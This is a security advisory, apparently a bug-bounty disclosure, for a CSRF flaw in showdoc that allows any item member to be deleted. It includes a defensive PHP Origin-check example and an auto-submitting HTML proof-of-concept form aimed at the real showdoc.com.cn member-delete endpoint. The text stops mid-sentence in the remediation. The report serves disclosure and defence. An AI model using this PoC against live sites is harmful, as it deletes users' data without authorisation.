Cross-Site Request Forgery (CSRF) in star7th/showdoc
Sep 6th 2021
With this CSRF vulnerability an attacker is able to delete any member of any item if a logged-in user visits the attacker's website.
The CSRF protection can be bypassed by placing the payload in an iframe or in a standalone HTML file and sending it to the victim: in that case the browser sets the Origin header to null, and the server's CSRF check does not reject the request.
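A server-side check that closes the gap described above, written here as an added example and not taken from showdoc's code base: the Origin header is compared against an allowlist, the literal string `null` sent by sandboxed iframes and local files can never match, and a missing Origin falls back to Referer and otherwise fails closed. The allowlist and the header arrays are constructed for the demonstration.

```php
<?php
// Added example (not showdoc's own code). Decide whether a state-changing
// request such as /api/member/delete may proceed, based on its source headers.
// $allowedOrigins is an assumed allowlist of the application's own origins.
function originAllowed(array $headers, array $allowedOrigins): bool
{
    $origin = $headers['Origin'] ?? null;

    // No Origin at all: fall back to Referer and rebuild scheme://host[:port].
    if ($origin === null || $origin === '') {
        $parts = parse_url($headers['Referer'] ?? '');
        if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
            return false; // nothing usable to verify against: fail closed
        }
        $origin = $parts['scheme'] . '://' . $parts['host']
            . (isset($parts['port']) ? ':' . $parts['port'] : '');
    }

    // The literal "null" Origin (sandboxed iframe, file:// page) is a plain
    // string here and never equals an allowlisted origin, so it is rejected.
    $needle = strtolower($origin);
    $haystack = array_map('strtolower', $allowedOrigins);
    return in_array($needle, $haystack, true);
}

$allowed = ['https://www.showdoc.com.cn'];

// Constructed header sets covering the cases the report describes.
$cases = [
    'same-origin form'        => ['Origin' => 'https://www.showdoc.com.cn'],
    'third-party site'        => ['Origin' => 'https://attacker.example'],
    'sandboxed iframe / file' => ['Origin' => 'null'],
    'no Origin, own Referer'  => ['Referer' => 'https://www.showdoc.com.cn/item/1'],
    'no source headers'       => [],
];

foreach ($cases as $label => $headers) {
    $verdict = originAllowed($headers, $allowed) ? 'allow' : 'reject';
    echo str_pad($label, 26) . ' => ' . $verdict . PHP_EOL;
}
```

Only the first and fourth cases are allowed; this check complements, rather than replaces, a per-session CSRF token and the SameSite cookie attribute mentioned in the remediation.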
🕵️♂️ Proof of Concept
1. Open PoC.html in Firefox or Safari.
2. You can then verify that the member with the email address `test`, which was already registered for the item with item_id 1531601670203344, has been deleted.
```html
<html>
  <body>
    <!-- Hide the real page path from the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the member deletion endpoint -->
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/delete" method="POST">
      <input type="hidden" name="item_id" value="1531601670203344" />
      <input type="hidden" name="item_member_id" value="187133" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Submit the first (and only) form on the page automatically
      document.forms[0].submit();
    </script>
  </body>
</html>
```
This vulnerability affects any item.
Set SameSite attribute of cookies to